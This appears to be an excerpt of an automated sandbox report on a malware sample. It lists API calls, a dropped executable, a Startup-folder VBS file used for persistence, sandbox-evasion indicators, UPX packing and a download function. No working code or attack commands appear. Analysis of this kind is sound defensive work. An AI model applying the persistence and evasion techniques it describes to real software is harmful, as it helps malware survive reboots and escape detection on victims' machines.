                  Source: Binary string: wntdll.pdbUGP source: name.exe, 00000002.00000003.2039035690.0000000004000000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2039157753.00000000041A0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000004.00000003.2052777335.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000004.00000003.2053042365.0000000003730000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.2179689028.0000000003740000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.2180712436.0000000003970000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: name.exe, 00000002.00000003.2039035690.0000000004000000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2039157753.00000000041A0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000004.00000003.2052777335.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000004.00000003.2053042365.0000000003730000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.2179689028.0000000003740000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.2180712436.0000000003970000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00DBC0B0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00DBC0B0
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CC0181 pushfd ; retf 0_2_00CC0195
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CC019E pushfd ; retf 0_2_00CC01A5
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CC01AE pushfd ; retf 0_2_00CC01B1
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CC01A6 pushfd ; retf 0_2_00CC01AD
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CC02AB push FFFFFFC0h; retf 0_2_00CC02AD
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C7C946 push ds; retf 0_2_00C7C949
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C7C94C push ds; retf 0_2_00C7C94D
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C7C950 push ds; retf 0_2_00C7C951
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C7C927 push ds; retf 0_2_00C7C929
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C7C937 push ds; retf 0_2_00C7C93D
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C7C934 push ds; retf 0_2_00C7C935
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C7C93F push ds; retf 0_2_00C7C945
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C80A68 push eax; retf 0_2_00C80A69
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C80A64 push eax; retf 0_2_00C80A65
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C80A3B push eax; retf 0_2_00C80A41
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C98B85 push ecx; ret 0_2_00C98B98
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C7B740 push es; retf 0_2_00C7B75A
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C7B88B push cs; retf 0_2_00C7B892
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C7B889 push cs; retf 0_2_00C7B88A
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C7B894 push cs; retf 0_2_00C7B89A
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CFF848 pushfd ; iretd 0_2_00CFF84E
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C7B83B push cs; retf 0_2_00C7B872
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CB1A9A push ss; retf 0_2_00CB1A9C
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CB1A9D push ss; retf 0_2_00CB1AA0
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CB1AA2 push ss; retf 0_2_00CB1AAC
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0002C590 push eax; retn 0002h2_2_0002C599
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00048B85 push ecx; ret 2_2_00048B98
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000AF84D pushfd ; iretd 2_2_000AF84E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00457186 push ecx; ret 5_2_00457199
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0045E55D push esi; ret 5_2_0045E566
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00457AA8 push eax; ret 5_2_00457AC6
                  Source: initial sampleStatic PE information: section name: UPX0
                  Source: initial sampleStatic PE information: section name: UPX1
                  Source: initial sampleStatic PE information: section name: UPX0
                  Source: initial sampleStatic PE information: section name: UPX1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00406EEB ShellExecuteW,URLDownloadToFileW,5_2_00406EEB
                  Source: C:\Users\user\Desktop\jv4ri.exeFile created: C:\Users\user\AppData\Local\directory\name.exeJump to dropped file

                  Boot Survival

                  barindex
                  Drops VBS files to the startup folder
                  Source: C:\Users\user\AppData\Local\directory\name.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbsJump to dropped file
                  Source: C:\Users\user\AppData\Local\directory\name.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbsJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,5_2_0041AADB
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C74A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00C74A35
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CF55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00CF55FD
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00024A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00024A35
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000A55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_000A55FD
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C933C7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C933C7
                  Source: C:\Users\user\Desktop\jv4ri.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Delayed program exit found
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040F7E2 Sleep,ExitProcess,5_2_0040F7E2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0040F7E2 Sleep,ExitProcess,12_2_0040F7E2
                  Switches to a custom stack to bypass stack traces
                  Source: C:\Users\user\AppData\Local\directory\name.exeAPI/Special instruction interceptor: Address: 3F73274
                  Source: C:\Users\user\AppData\Local\directory\name.exeAPI/Special instruction interceptor: Address: D33274
                  Source: C:\Users\user\AppData\Local\directory\name.exeAPI/Special instruction interceptor: Address: 3263274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,5_2_0041A7D9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,12_2_0041A7D9
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-100002
                  Source: C:\Users\user\Desktop\jv4ri.exeAPI coverage: 4.5 %
                  Source: C:\Users\user\AppData\Local\directory\name.exeAPI coverage: 4.8 %
                  Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 6.1 %
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CD4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00CD4696
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CDC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00CDC9C7
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CDC93C FindFirstFileW,FindClose,0_2_00CDC93C
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CDF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CDF200
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CDF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CDF35D
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CDF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CDF65E
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CD3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00CD3A2B
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CD3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00CD3D4E
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CDBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CDBF27
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00084696 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00084696
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0008C93C FindFirstFileW,FindClose,2_2_0008C93C
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0008C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_0008C9C7
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0008F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0008F200
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0008F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0008F35D
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0008F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0008F65E
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00083A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00083A2B
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00083D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00083D4E
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0008BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0008BF27
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,5_2_0040C388
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_0040928E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,5_2_0041C322
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_004096A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,5_2_00408847
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00407877 FindFirstFileW,FindNextFileW,5_2_00407877
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0044E8F9 FindFirstFileExA,5_2_0044E8F9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,5_2_0040BB6B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,5_2_00419B86
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,5_2_0040BD72
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_0040928E
